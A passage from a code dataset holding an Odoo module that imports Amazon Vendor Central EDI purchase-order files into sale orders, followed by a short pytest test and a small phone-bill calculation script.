fields.Char('Invoice Party ID',readonly=True)\n currancy_code = fields.Char('Currency Code',readonly=True)\n order_id = fields.Char('Sale Order ID',readonly=True) \n vat_number = fields.Char('VAT Registration Number',readonly=True)\n max_delivery_date_ept = fields.Date(string = 'Max Delivery Date')\n delivery_date_ept = fields.Date(string='Delivery Date')\n \n @api.multi\n def action_confirm(self):\n res = super(sale_order,self).action_confirm()\n for order in self:\n if order.is_amazon_edi_order:\n for picking in order.picking_ids:\n carrier_type = order.vendor_id and order.vendor_id.delivery_type\n picking.write({'carrier_type' : carrier_type , 'vendor_id' : order.vendor_id.id})\n \n @api.multi\n def reimport_amazon_po_file(self):\n sale_order_line_obj = self.env['sale.order.line']\n product_obj = self.env['product.product']\n job_id = self.env['avc.file.transaction.log'].search([('sale_order_id','=',self.id)])\n if job_id :\n data = job_id.attachment_id and job_id.attachment_id.datas\n file = StringIO(base64.decodestring(data).decode())\n reader = csv.reader(file,delimiter=\"'\",quotechar='|')\n order_line_info = {}\n line_no = 1\n for segment in reader:\n for seg in segment:\n if seg.startswith('LIN+'):\n order_line_info.update({'Line_'+str(line_no):{}})\n ean = seg.split(\"+\")\n ean = ean[len(ean)-1] \n if ean.upper().find('EN',0,len(ean)) !=-1 and ean.upper().find(':',0,len(ean)) !=-1:\n ean = ean.split(\":\") and ean.split(\":\")[0] or ''\n order_line_info['Line_'+str(line_no)].update({'ean':ean})\n #UP used for Universal Product Code **code edited here**\n elif ean.upper().find('UP',0,len(ean)) !=-1 and ean.upper().find(':',0,len(ean)) !=-1:\n ean = ean.split(\":\") and ean.split(\":\")[0] or ''\n order_line_info['Line_'+str(line_no)].update({'ean':ean})\n line_no += 1\n \n elif seg.startswith('PIA+'):\n code = seg.split(\"+\") \n code = code[2][:-3] if len(code)>2 else ''\n if not order_line_info['Line_'+str(line_no-1)].get('ean',False):\n order_line_info['Line_'+str(line_no-1)].update({'default_code':code})\n \n \n elif seg.startswith('QTY+'):\n qty = seg.split(\":\") \n qty = qty[1] if len(qty)>1 else 0\n order_line_info['Line_'+str(line_no-1)].update({'qty':qty})\n \n elif seg.startswith('PRI+'):\n price = seg.split(\":\") \n price = price[1] if len(price)>1 else 0\n order_line_info['Line_'+str(line_no-1)].update({'price':price})\n \n for key,value in order_line_info.items():\n amazon_code = value.get('default_code') or value.get('ean')\n sale_order_line = sale_order_line_obj.search([('amazon_edi_line_code','=',amazon_code),('order_id','=',self.id)])\n if not sale_order_line:\n product = product_obj.search([('amazon_sku','=',amazon_code)])\n if not product:\n product = product_obj.search([('default_code','=',amazon_code)])\n amazon_edi_code = 'SKU'\n if not product :\n product = product_obj.search([('barcode','=',amazon_code)])\n amazon_edi_code = 'barcode'\n if product:\n qty = value.get('qty',0.0)\n price = value.get('price',0.0) \n line=(product,price,amazon_code,qty)\n orderlinevals,product_id, qty_code = self.prepare_order_line_vals(line,self)\n if orderlinevals:\n sale_order_line = sale_order_line_obj.create(orderlinevals)\n remark = amazon_edi_code + ':' + amazon_code\n transaction_line = self.env['avc.transaction.log.line'].search([('job_id','=',job_id.id),('remark','=',remark),('operation_type','=','import')])\n if transaction_line:\n vals = {\n 'message':'Sale Order Line Created',\n 'remark':'sale order id %s'%(self.name or ''),\n 'sale_order_id':self.id,\n 
'job_id':job_id.id,\n 'picking_id':False,\n 'back_order_id':False,\n 'sale_order_line_id':sale_order_line.id,\n 'product_id':orderlinevals.get('product_id',''),\n 'package_id':False,\n 'stock_inventory_id':False,\n 'company_id':job_id.company_id.id or False,\n 'user_id':self.env.user.id,\n 'picking_state':'draft',\n 'application':'sale_order',\n 'export_qty':orderlinevals.get('product_uom_qty',''),\n 'processed_qty':orderlinevals.get('product_uom_qty',''),\n 'manually_processed':False,\n 'is_mismatch_detail':False,\n 'skip_line':False,\n 'skip_order':False,\n 'filename':job_id.attachment_id.name,\n 'create_date':datetime.now(),\n 'operation_type':'import',\n 'price':price,\n }\n transaction_line.write(vals)\n \n \n return True\n \n @api.multi\n def export_dispatch_advice(self):\n \"\"\"\n Use: To send Dispatch Advice to Amazon Vendor Central via EDI 856 file. Call manually from Sale Order Form view\n :return: Boolean\n \"\"\"\n self.sync_export_dispatch_advice(sale_order_ids = self)\n return True\n \n @api.model\n def sync_import_amazon_edi_order(self,args={},file_datas=None, ):\n \"\"\"\n Use : For import EDI 850 Purchase Order file\n This method call by cron,\n :param args: arguments pass by cron (vendor_id)\n :param file_datas: If Purchase Order create manualy then here you can send file.\n :return: Boolean\n \"\"\"\n if not args.get('vendor_id'):\n vendor_id = self.env['ir.values'].get_default('avc.config.settings', 'vendor_id')\n else:\n vendor_id = args.get('vendor_id')\n print (\"cron run vendor id : %s\"%(vendor_id))\n vendor_obj = self.env['amazon.vendor.instance'].browse(vendor_id)\n self.import_sales_from_amazon_edi(vendor_obj,file_data=file_datas )\n return True\n \n @api.multi\n def import_sales_from_amazon_edi(self, vendor_ids = None,file_data=None):\n \"\"\"\n Use: Fetch the sale orders file from FTP location,\n format the data into format required by Odoo\n and create the sale in Odoo\n :param vendor_id: Amazon Vendor Central Instance ID\n :param file_data: EDI 850 Purchase Order file\n :return: Boolean\n \"\"\"\n ctx = self._context.copy() or {}\n \n for vendor in vendor_ids:\n self.job_id = None\n self.filename = None\n self.server_filename = None\n self.export_avc_line_id = []\n self.ack_error_lines=[]\n \n filenames_dict ={}\n if file_data:\n imp_file = StringIO(base64.decodestring(file_data))\n file_write = open('/tmp/order_data.txt','wb')\n file_write.writelines(imp_file.getvalue())\n file_write.close()\n file_read = open('/tmp/order_data.txt', \"rU\")\n dialect = csv.Sniffer().sniff(file_read.readline())\n file_read.seek(0)\n reader = csv.reader(file_read,delimiter=\"'\",quotechar='|')\n file_read.seek(0)\n self.process_file_and_prapare_order(file_read)\n else:\n file_to_delete = []\n connection_id = False\n if vendor.is_production_environment:\n ftp_server_id = vendor.production_ftp_connection\n directory_id = vendor.production_po_directory_id\n else :\n ftp_server_id = vendor.test_ftp_connection\n directory_id = vendor.test_po_directory_id\n \n with vendor.get_edi_receive_interface(ftp_server_id,directory_id) \\\n as edi_interface:\n # `filenames` contains a list of filenames to be imported \n filenames_dict = edi_interface.pull_from_ftp(vendor.po_file_import_prefix) \n \n for server_filename, filename in filenames_dict.items():\n \n with open(filename) as file:\n self.job_id = None\n self.filename = filename\n self.server_filename = server_filename\n ctx.update({'filename':server_filename})\n self.process_file_and_prapare_order(vendor,file)\n 
file_to_delete.append(server_filename) # : Ekta\n \n if self.job_id:\n binary_package = open(filename).read().encode()\n attachment_vals = {\n 'name':server_filename,\n 'datas':base64.encodestring(binary_package),\n 'datas_fname':server_filename,\n 'type':'binary',\n 'res_model': 'avc.file.transaction.log',\n 'res_id':self.job_id.id,\n }\n \n attachment=self.env['ir.attachment'].create(attachment_vals)\n self.job_id.write({'attachment_id' : attachment.id})\n self.job_id.message_post(body=_(\"PO Import File\"),attachment_ids=attachment.ids)\n self.job_id.message_post(body=_((\"Sale Order created %s\"%(self.order_id.name or '') if self.order_id else \"Information Mismatch\")))\n if vendor.auto_confirm_sale_order and vendor.auto_generate_po_ack and self.order_id:\n self.auto_send_poa(sale_order_id = self.order_id)\n\n if file_to_delete:\n with vendor.get_edi_receive_interface(ftp_server_id,directory_id) \\\n as edi_interface:\n edi_interface.sftp_client.chdir(edi_interface.download_dir)\n for filename in file_to_delete:\n edi_interface.delete_from_ftp(filename)\n return True\n\n @api.multi\n def auto_send_poa(self,sale_order_id = None):\n \"\"\"\n USE: This method will call export_po_ack() of stock.picking,\n :param sale_order_id:\n :return: stock.picking's export_po_ack()\n \"\"\"\n if self.instance_id.auto_confirm_sale_order:\n res = sale_order_id.action_confirm()\n if res:\n picking_id = sale_order_id.mapped('picking_ids')\n if picking_id:\n return picking_id[0].export_po_ack()\n else:\n message = \"First of all set Sale Order Auto Confirm as True from Amazon Vendor Central >> Configuration >> Vendor >> Purchase Order Acknowledgement.\"\n _logger.info(message)\n raise osv.except_osv(_('Purchase Order Auto Acknowledgement send error'),_(message))\n\n @api.multi\n def process_file_and_prapare_order(self,vendor,file):\n \"\"\"\n Use: Decode Amazon EDI 850 Purchase Order file and create sale order, sale order lines and required log entries.\n :param file: EDI 850 Purchase Order file\n :return: Boolean\n \"\"\"\n #declaration\n country_obj = self.env['res.country']\n partner_obj = self.env['res.partner'] \n sale_order_obj = self.env['sale.order'] \n sale_order_line_obj = self.env['sale.order.line']\n product_product_obj = self.env['product.product']\n \n delivery_address = {}\n order_line_info = {}\n inv_address_data = {}\n order_info = {}\n message_info = {} \n line_no = 1\n order_line = 0\n total_segment = 0\n self.order_type = ''\n \n #read and seprate file in diffrent part\n for segment in csv.reader(file,delimiter=\"'\",quotechar='|'):\n for seg in segment:\n if seg.startswith('UNB+UNOA') or seg.startswith('UNB+UNOC'):\n header = seg.split(\"+\")\n message_info.update({'sender_id' : header[2][:-3],'recipient_id' : header[3][:-3]})\n total_segment +=1\n \n elif seg.startswith('UNH'):\n msg_type = seg.split(\"+\")\n msg_type = msg_type[2].split(\":\")[0] if len(msg_type)>2 else ''\n message_info.update({'message_type' : msg_type})\n total_segment +=1\n \n elif seg.startswith('BGM+'):\n order_name = seg.split(\"+\")\n order_name = order_name[2] if len(order_name) >= 3 else ''\n order_info.update({'order_name':order_name})\n total_segment +=1\n \n elif seg.startswith('DTM+137'):\n date_seg = seg.split(\":\")\n date_order = datetime.strptime(date_seg[1], '%Y%m%d')\n order_info.update({'date_order':date_order})\n total_segment +=1\n \n elif seg.startswith('DTM+63'):\n date_seg = seg.split(\":\")\n delivery_date = datetime.strptime(date_seg[1], '%Y%m%d')\n 
order_info.update({'delivery_date':delivery_date})\n message_info.update({'max_delivery_date_ept':delivery_date})\n total_segment +=1\n \n elif seg.startswith('DTM+64'):\n date_seg = seg.split(\":\")\n earliest_date = datetime.strptime(date_seg[1], '%Y%m%d')\n message_info.update({'delivery_date_ept' : earliest_date})\n total_segment +=1\n \n elif seg.startswith('RFF+ADE'):\n order = seg.split(\":\")\n self.order_type = order[1]\n total_segment +=1\n\n elif seg.startswith('RFF+PD'):\n total_segment +=1\n \n elif seg.startswith('NAD+BY'):\n buyer_id = seg.split(\":\")\n buyer_address = buyer_id[0][7:]+':'+buyer_id[2]\n buyer_id = buyer_id and buyer_id[0][7:]\n message_info.update({'buyer_id':buyer_id,'buyer_address':buyer_address})\n total_segment +=1\n continue\n \n elif seg.startswith('NAD+SU'):\n supplier_id = seg.split(\":\")\n supplier_id = supplier_id and supplier_id[0][7:]\n message_info.update({'supplier_id':supplier_id})\n total_segment +=1\n continue\n \n elif seg.startswith('NAD+DP'):\n delivery = seg.split(\"+\")\n delivery_party_id = delivery[2][:-3]\n country_code = delivery[len(delivery)-1]\n country_id = country_obj.search([('code', 'ilike', country_code)])\n message_info.update({'delivery_party_id':delivery_party_id,'country_code':country_code})\n delivery_address = {'name': delivery[4],\n 'street':delivery[5],\n 'city':delivery[6],\n 'zip':delivery[8],\n 'country_id':country_id.id,\n }\n\n total_segment +=1\n continue\n #vendors information get from this part\n elif seg.startswith('NAD+IV'):\n invoice_seg = seg.split(\"+\")\n invoice_id = invoice_seg and invoice_seg[2][:-3]\n message_info.update({'invoice_id':invoice_id})\n if invoice_seg[4].find(\":\") >= 0 :\n customer = invoice_seg[4].split(\":\")\n elif invoice_seg[4].find(\",\") >=0:\n customer = invoice_seg[4].split(\",\")\n country_id = country_obj.search([('code', 'ilike', invoice_seg[9])])\n\n #partner_id = partner_obj.search([('name', '=', customer[0])],)\n partner_id = vendor.so_customer_id\n# if not partner_id:\n# partner_vals = {'name':customer[0],'opt_out':True}\n# partner_id = partner_obj.create(partner_vals)\n inv_address_data = {\n 'type':'invoice',\n 'name': \"%s\" %(customer[0]),\n 'street': customer[1],\n 'street2': invoice_seg[5],\n 'city': invoice_seg[6],\n 'zip': invoice_seg[8],\n 'country_id': country_id[0].id if country_id else False,\n 'parent_id': partner_id.id,\n }\n if delivery_address:\n delivery_address.update({'parent_id': partner_id.id,'type':'delivery'})\n order_info.update({'delivery_address': delivery_address})\n order_info.update({'inv_address_data':inv_address_data}) \n# customer_info.append(inv_address_data)\n total_segment +=1 \n continue \n \n elif seg.startswith('RFF+VA'):\n vat_number = seg.split(\":\")\n message_info.update({'vat_number':vat_number[1]})\n total_segment +=1\n continue\n \n elif seg.startswith('CUX+2'):\n currancy = seg.split(\":\")\n currancy_code = currancy[1]\n currency_id = self.env['res.currency'].search([('name','=',currancy_code)])\n currency_id = currency_id and currency_id[0] or False\n pricelist_id = vendor and vendor.pricelist_id or False\n pricelist_id = pricelist_id and pricelist_id.id or False\n order_info.update({'currency_id':currency_id.id,'pricelist_id':pricelist_id})\n message_info.update({'currancy_code':currancy_code})\n total_segment +=1\n continue\n #sale order line data saprate here\n elif seg.startswith('LIN+'):\n order_line_info.update({'Line_'+str(line_no):{}})\n ean = seg.split(\"+\")\n ean = ean[len(ean)-1] \n if 
ean.upper().find('EN',0,len(ean)) !=-1 and ean.upper().find(':',0,len(ean)) !=-1:\n ean = ean.split(\":\") and ean.split(\":\")[0] or ''\n order_line_info['Line_'+str(line_no)].update({'ean':ean})\n #UP used for Universal Product Code **code edited here**\n elif ean.upper().find('UP',0,len(ean)) !=-1 and ean.upper().find(':',0,len(ean)) !=-1:\n ean = ean.split(\":\") and ean.split(\":\")[0] or ''\n order_line_info['Line_'+str(line_no)].update({'ean':ean})\n line_no += 1\n order_line +=1\n total_segment +=1\n \n elif seg.startswith('PIA+'):\n code = seg.split(\"+\") \n code = code[2][:-3] if len(code)>2 else ''\n if not order_line_info['Line_'+str(line_no-1)].get('ean',False):\n order_line_info['Line_'+str(line_no-1)].update({'default_code':code})\n total_segment +=1\n \n elif seg.startswith('QTY+'):\n qty = seg.split(\":\") \n qty = qty[1] if len(qty)>1 else 0\n order_line_info['Line_'+str(line_no-1)].update({'qty':qty})\n total_segment +=1\n \n elif seg.startswith('PRI+'):\n price = seg.split(\":\") \n price = price[1] if len(price)>1 else 0\n order_line_info['Line_'+str(line_no-1)].update({'price':price})\n total_segment +=1 \n \n elif seg.startswith('UNS+S'):\n total_segment +=1\n \n elif seg.startswith('CNT+2'):\n total_line = seg.split(\":\") \n total_line = total_line[1] if len(total_line)>1 else 0\n total_segment +=1\n \n if int(total_line) != order_line:\n raise osv.except_osv(_('Error'), _('Order Line not integrated properly, Please Check order line data in file.')) \n \n elif seg.startswith('UNT+'):\n segments = seg.split(\"+\")\n segments = segments[1]\n if int(segments) != total_segment:\n raise osv.except_osv(_('Error'), _('File not integrated properly, Please Check file data.'))\n\n if not vendor.supplier_id == message_info.get('supplier_id', ''):\n if not self.job_id:\n avc_file_process_job_vals = {\n 'message':'Mismatch Supplier Information',\n 'filename':self.server_filename,\n 'vendor_id':vendor.id,\n 'application':'sale_order',\n 'operation_type':'import',\n 'create_date':datetime.now(),\n 'company_id':vendor.company_id.id or False,\n }\n self.job_id = self.create_avc_file_process_job(avc_file_process_job_vals)\n return True\n \n if not vendor.pricelist_id.currency_id.id == order_info.get('currency_id'):\n if not self.job_id:\n avc_file_process_job_vals = {\n 'message':'Mismatch Pricelist information',\n 'filename':self.server_filename,\n 'vendor_id':vendor.id,\n 'application':'sale_order',\n 'operation_type':'import',\n 'create_date':datetime.now(),\n 'company_id':vendor.company_id.id or False,\n }\n self.job_id = self.create_avc_file_process_job(avc_file_process_job_vals)\n return True\n #checked if order exist or not\n existing_order_id = sale_order_obj.search([('amazon_edi_order_id', '=', order_info.get('order_name', ''))])\n if self.order_type == 'firstorder':\n if existing_order_id:\n return True\n\n #message_id = self.env['amazon.edi.message.info'].create(message_info)\n order_vals = self.prepare_order_vals(vendor,order_info,message_info.get('delivery_party_id',False))\n order_vals.update({'vendor_id':vendor.id,'account_type':self.order_type, 'carrier_id':vendor.amazon_edi_carrier_method.id or False})\n order_vals.update(message_info)\n if vendor.warehouse_id : \n order_vals.update({'warehouse_id':vendor.warehouse_id.id})\n order_id = sale_order_obj.create(order_vals)\n #message_id.write({'order_id':order_id.id})\n #self.order_id = order_id \n fiscal_position_id = order_vals.get('fiscal_position_id',False)\n fiscal_position = 
self.env['account.fiscal.position'].browse(fiscal_position_id) or False \n line_id = False\n \n #CREATE LOG IN avc.file.transaction.log\n avc_file_process_job_vals = {\n 'message': 'Order imported',\n 'filename': self.server_filename,\n 'vendor_id': vendor.id,\n 'application' : 'sale_order',\n 'operation_type' : 'import',\n 'create_date' : datetime.now(),\n 'company_id':vendor.company_id.id or False,\n 'sale_order_id':order_id.id,\n }\n self.job_id = self.create_avc_file_process_job(avc_file_process_job_vals)\n \n for key,value in order_line_info.items():\n default_code = value.get('default_code',False)\n ean = value.get('ean',False)\n product = False\n if default_code:\n product = product_product_obj.search([('amazon_sku','=',default_code)])\n if not product :\n product = product_product_obj.search([('default_code','=',default_code)]) \n code_type=\"SKU\"\n amazon_code = default_code\n amazon_edi_line_code_type = 'sku'\n if ean :\n product = product_product_obj.search([('barcode','=',ean)])\n code_type = \"barcode\"\n amazon_code = ean\n amazon_edi_line_code_type = 'barcode'\n orderlinevals ={}\n line = ()\n if product:\n qty = value.get('qty',0.0)\n price = value.get('price',0.0) \n line=(product,price,amazon_code,qty)\n \n orderlinevals,product_id, qty_code = self.prepare_order_line_vals(line,order_id)\n orderlinevals.update({'amazon_edi_line_code_type' : amazon_edi_line_code_type})\n if orderlinevals:\n sale_order_line_id = sale_order_line_obj.create(orderlinevals)\n \n avc_transaction_log_val = {\n 'message':'Sale Order Line Created',\n 'remark':'sale order id %s'%(order_id.name or ''),\n 'sale_order_id':order_id.id,\n 'job_id':self.job_id.id,\n 'picking_id':False,\n 'back_order_id':False,\n 'sale_order_line_id':sale_order_line_id.id,\n 'product_id':orderlinevals.get('product_id',''),\n 'package_id':False,\n 'stock_inventory_id':False,\n 'company_id':self.job_id.company_id.id or False,\n 'user_id':self.env.user.id,\n 'picking_state':'draft',\n 'application':'sale_order',\n 'export_qty':orderlinevals.get('product_uom_qty',''),\n 'processed_qty':orderlinevals.get('product_uom_qty',''),\n 'manually_processed':False,\n 'is_mismatch_detail':False,\n 'skip_line':False,\n 'skip_order':False,\n 'filename':self.server_filename,\n 'create_date':datetime.now(),\n 'operation_type':'import',\n 'price':price,\n }\n self.job_id.transaction_log_ids.create(avc_transaction_log_val)\n else:\n line = line + (False,qty_code)\n self.ack_error_lines.append(line)\n self.create_avc_transaction_lines(order_id,code_type='SKU',code=code,processed_qty=qty,msg='Product not found',price=price)\n else:\n qty_code = 182\n line = line + (False,qty_code)\n self.ack_error_lines.append(line)\n self.create_avc_transaction_lines(order_id,code_type='barcode',code=amazon_code,processed_qty=qty,msg='Product not found',price=price)\n return True\n\n @api.multi\n def prepare_order_vals(self,vendor,order_info,delivery_party_id):\n \"\"\"\n Use: To generate sale order's value based on given information.\n :param order_info: Sale Order required information\n :param delivery_party_id: Delivery Party ID\n :return: sale order values (dict{})\n \"\"\"\n sale_order_obj = self.env['sale.order']\n partner_obj = self.env['res.partner']\n address_data = order_info.get('inv_address_data',{})\n delivery_address = order_info.get('delivery_address',{})\n partner_id=address_data.get('parent_id',False)\n if not partner_id:\n return\n \n inv_add_domain=[]\n for address in address_data:\n 
inv_add_domain.append((address,'=',address_data.get(address)))\n\n inv_add_id = partner_obj.search(inv_add_domain)\n inv_add_id = inv_add_id and inv_add_id[0] \n if not inv_add_id:\n inv_add_id = partner_obj.create(address_data)\n \n delivert_add_domain=[]\n for address in delivery_address:\n delivert_add_domain.append((address,'=',delivery_address.get(address)))\n \n delivery_add_id = partner_obj.search(delivert_add_domain)\n delivery_add_id = delivery_add_id and delivery_add_id[0]\n if not delivery_add_id:\n delivery_add_id = partner_obj.create(delivery_address)\n \n delivery_id = partner_obj.search([('edi_gln_no','=',delivery_party_id),('parent_id','=',partner_id)])\n if not delivery_id:\n delivery_id = partner_obj.search([('edi_gln_no','=',delivery_party_id)])\n if delivery_id and delivery_id.id != partner_id:\n delivery_id.write({'parent_id':partner_id})\n else:\n partner_obj.browse(partner_id).write({'edi_gln_no': delivery_party_id})\n\n partner_address = partner_obj.browse(partner_id).address_get(['contact','invoice','delivery'])\n \n ordervals={\n 'company_id':vendor.company_id.id or False,\n 'partner_id' :partner_address.get('contact',False),\n }\n new_record = sale_order_obj.new(ordervals)\n new_record.onchange_partner_id()\n ordervals = sale_order_obj._convert_to_write({name: new_record[name] for name in new_record._cache})\n new_record = sale_order_obj.new(ordervals)\n new_record.onchange_partner_shipping_id()\n ordervals = sale_order_obj._convert_to_write({name: new_record[name] for name in new_record._cache})\n ordervals.update({\n 'name' : order_info.get('order_name'),\n 'amazon_edi_order_id' : order_info.get('order_name',''),\n 'picking_policy' : vendor.picking_policy or False,\n 'date_order' : order_info.get('date_order',False) and order_info['date_order'].strftime('%Y-%m-%d') or time.strftime('%Y-%m-%d'),\n 'state' : 'draft',\n #'invoice_status' : self.instance_id.amazon_edi_invoice_status or 'invoiced',\n 'mismatch_product' : vendor.mismatch_product,\n 'is_amazon_edi_order' : True,\n 'note': order_info.get('order_name',''),\n 'client_order_ref' : order_info.get('order_name',''),\n 'pricelist_id': order_info.get('pricelist_id',False),\n })\n return ordervals\n \n# @api.multi\n# def _get_product_stock_for_ack(self,vendor,location_id,company_id):\n# ## Query for get stock based on configuration\n# # location_id = vendor.warehouse_id and vendor.warehouse_id.location_id and vendor.warehouse_id.location_id.id\n# # company_id = vendor.company_id and vendor.company_id.id\n# qry = \"\"\n# stock_dict = {}\n# if vendor.picking_policy_based_on == 'qty_on_hand' :\n# qry = \"\"\"\n# select product_id,sum(quantity)-sum(reserved_quantity) as total_qty from stock_quant \n# where location_id in (%s) and company_id=(%s)\n# group by product_id\n# \"\"\"%(location_id,company_id)\n# if vendor.picking_policy_based_on == 'forecast_sale' :\n# qry = \"\"\"\n# select product_id,sum(total_qty)\n# from\n# (\n# select product_id,sum(quantity)-sum(reserved_quantity) as total_qty from stock_quant \n# where location_id in (%s) and company_id=%s\n# group by product_id\n# union all \n# select product_id,sum(product_qty) as total_qty from stock_move\n# where location_dest_id in (%s) and company_id=%s and state not in ('draft','done','cancel')\n# group by product_id\n# union all \n# select product_id,-sum(product_qty) as total_qty from stock_move\n# where location_id in (%s) and company_id=%s and state in ('waiting','confirmed')\n# group by product_id \n# )T\n# group by product_id\n# \n# 
\"\"\"%(location_id,company_id,location_id,company_id,location_id,company_id)\n# self._cr.execute(qry)\n# results = self._cr.fetchall()\n# for result_tuple in results:\n# stock_dict.update({result_tuple[0] : result_tuple[1]})\n# return stock_dict\n @api.multi\n def prepare_order_line_vals(self,line_info,order_id):\n \"\"\"\n Use: create sale order line values\n :param line_info: sale order line dict\n :param order_id: sale order id\n :param fiscal_position: fiscal position\n :return: sale_order_line dict{}, product_id, qty_code\n \"\"\"\n product_id = line_info[0]\n file_price = line_info[1]\n amazon_edi_code = line_info[2]\n qty = float(line_info[3])\n product_product = self.env['product.product']\n sale_order_line_obj = self.env['sale.order.line']\n qty_code = False\n \n #product_id = product_product.search([('default_code','=',default_code)])\n if not product_id:\n qty_code = 182\n return () , product_id, qty_code\n orderlinevals = {\n 'order_id' : order_id.id,\n 'product_id' : product_id.id,\n } \n new_record = sale_order_line_obj.new(orderlinevals)\n new_record.product_id_change()\n orderlinevals=new_record._convert_to_write({name: new_record[name] for name in new_record._cache}) \n orderlinevals.update({\n 'product_uom_qty' : qty,\n 'price_unit' : float(file_price),\n 'customer_lead' : product_id and product_id.product_tmpl_id.sale_delay,\n 'invoice_status' : 'invoiced',\n 'amazon_edi_line_code': amazon_edi_code,\n })\n qty_code = 12\n return orderlinevals, product_id, qty_code\n\n @api.multi\n def prepare_line(self, fiscal_position=None, product_id=None, order_id=None, qty=None, file_price=None, amazon_edi_code=None):\n \"\"\"\n Use: Prepare sale order line data with backorder value\n :param fiscal_position: Fiscal Position\n :param product_id: Product ID\n :param order_id: Sale Order ID\n :param qty: Ordered Quantity\n :param file_price: Received price in PO file\n :param amazon_edi_code: Barcode / received from PO file\n :return: sale order line dict{}, product_id, qty_code\n \"\"\"\n sale_order_line_obj = self.env['sale.order.line']\n tax_id = False\n if fiscal_position:\n tax_id = fiscal_position.map_tax(product_id.taxes_id).ids\n\n orderlinevals = {\n 'order_id':order_id.id,\n 'product_id':product_id.id,\n }\n new_record = sale_order_line_obj.new(orderlinevals)\n new_record.product_id_change()\n orderlinevals = new_record._convert_to_write({name:new_record[name] for name in new_record._cache})\n if not orderlinevals.get('tax_id', []):\n tax_id = [(6, 0, tax_id)]\n orderlinevals.update({'tax_id':tax_id})\n orderlinevals.update({\n 'product_uom_qty':qty,\n 'price_unit':float(file_price),\n 'customer_lead':product_id and product_id.product_tmpl_id.sale_delay,\n 'invoice_status':'invoiced',\n 'amazon_edi_line_code':amazon_edi_code,\n })\n return orderlinevals, product_id\n\n @api.multi\n def create_avc_file_process_job(self,vals):\n \"\"\"\n Use: To create new record in avc.file.transaction.log model.\n :param vals: Required Value for avc.file.transaction.log\n :return: avc.file.transaction.log new record ID\n \"\"\"\n avc_file_process_job_obj=self.env['avc.file.transaction.log']\n job_id = avc_file_process_job_obj.create(vals)\n return job_id\n \n @api.multi\n def create_avc_transaction_lines(self,order,code_type=None,code=None,processed_qty=None,msg=None,price=None,product_id=None):\n \"\"\"\n Use: To create avc.transaction.log.line new line.\n :param code_type: code information sku/barcode\n :param code: code data\n :param processed_qty: ordered quantity\n :param msg: message 
for log line\n        :param price: price of the ordered product\n        :param product_id: product id if available\n        :return: avc.transaction.log.line's id\n        \"\"\"\n        # it makes an entry in avc.transaction.log.line\n        avc_transaction_log_val = {\n            'message':msg if msg else 'Product not Found',\n            'remark': '%s:%s'%(code_type,code),\n            'sale_order_id':order.id,\n            'job_id':self.job_id.id,\n            'company_id':self.job_id.company_id.id or False,\n            'user_id':self.env.user.id,\n            'application':'sale_order',\n            'export_qty':0.0,\n            'processed_qty':processed_qty,\n            'manually_processed':False,\n            'is_mismatch_detail':False if product_id else True,\n            'skip_line':True,\n            'skip_order':False,\n            'filename':self.server_filename,\n            'create_date':datetime.now(),\n            'operation_type':'import',\n            'price':price,\n            'product_id':product_id if product_id else False,\n            }\n        res = self.job_id.transaction_log_ids.create(avc_transaction_log_val)\n        return res\n\n    @api.multi\n    def to_pdf417(self,order_id, packages):\n        \"\"\"\n        Use: This method is called from the \"report_edi_saleorder_barcode_label\" QWeb report.\n             It creates the PDF417 format barcode used in the GS1-128 label.\n        :param order_id: sale order id\n        :param packages: packages dictionary\n        :return: barcode label base64 image data\n        \"\"\"\n        sale_order_id = self.browse(order_id)\n        text = \"AMZN\"\n        text = text + ',PO: ' + sale_order_id.amazon_edi_order_id\n        for package in packages:\n            if package.get('barcode'):\n                text = text + ',UPC: ' + str(package.get('barcode')) + ','\n            else:\n                text = text + ',EAN: ' + str(package.get('default_code')) + ','\n            text = text + 'QTY: ' + str(package.get('product_qty'))\n\n        print(text)\n\n        codes = encode(text, columns=5)\n        image = render_image(codes)\n        buffer = StringIO()\n        image.save(buffer, format=\"JPEG\")\n        img_str = base64.b64encode(buffer.getvalue())\n\n        return img_str\n\n    @api.multi\n    def get_total_qty(self):\n        \"\"\"\n        Use: This method is called from the \"report_edi_saleorder_barcode_label\" QWeb report.\n        :return: total quantity of the selected sale order.\n        \"\"\"\n        qty = 0\n        for line in self.order_line:\n            qty += line.product_uom_qty\n        return qty\n\n    @api.multi\n    def get_package_information(self,order_id=None):\n        \"\"\"\n        Use: To get a particular sale order's package information.\n        :param order_id: sale order id\n        :return: dictionary with package information.\n        \"\"\"\n        res = {}\n        sale_order_id = self.browse(order_id)\n        for ids in sale_order_id.picking_ids.pack_operation_product_ids:\n            line_info = {'product_id':ids.product_id.id, 'product_qty':ids.product_qty, 'default_code':ids.product_id.default_code or '', 'barcode':ids.product_id.barcode or ''}\n            if res.get(ids.result_package_id.name):\n                data = res.get(ids.result_package_id.name)\n                data.append(line_info)\n                res.update({ids.result_package_id.name:data})\n            else:\n                res.update({ids.result_package_id.name:[line_info]})\n        return res\n\n    @api.multi\n    def _prepare_invoice(self):\n        \"\"\"\n        USE: this method calls super()._prepare_invoice() of sale.order, then checks\n             whether the current sale order is an Amazon Vendor Central order; if so, it\n             updates journal_id with the journal set on the Amazon vendor instance.\n        :return: invoice_value dict\n        \"\"\"\n        res = super(sale_order, self)._prepare_invoice()\n        if self.is_amazon_edi_order and self.vendor_id.journal_id:\n            res.update({'journal_id':self.vendor_id.journal_id.id})\n        return 
res","sub_path":"odoo_apps/amazon_vendor_central_ept/model/amazon_sale_order.py","file_name":"amazon_sale_order.py","file_ext":"py","file_size_in_byte":45906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"507685847","text":"import pytest\nimport src.misc as misc\n\n\n@pytest.mark.parametrize(\"answer, expected_answer\",\n [('', True),\n (' ', True),\n ('yes', True),\n ('Yes', True),\n ('YES', True),\n ('Y', True),\n ('no', False),\n ('No', False),\n ('NO', False),\n ('N', False)])\ndef test_confirm(monkeypatch, answer, expected_answer):\n monkeypatch.setattr('builtins.input', lambda x: answer)\n assert misc.confirm() == expected_answer","sub_path":"tests/misc_test.py","file_name":"misc_test.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"276573562","text":"def main():\n # escribe tu código abajo de esta línea\n msj=int(input(\"Dame el número de mensajes: \"))\n m=float(input(\"Dame el número de megas: \"))\n minutos=int(input(\"Dame el numero de minutos¨: \"))\n\n mensajes=0.80*msj\n megas=0.80*m\n min=0.80*minutos\n\n costomensual= mensajes+megas+min\n print(\"El costo mensual es:\",costomensual)\n\nif __name__ == '__main__':\n 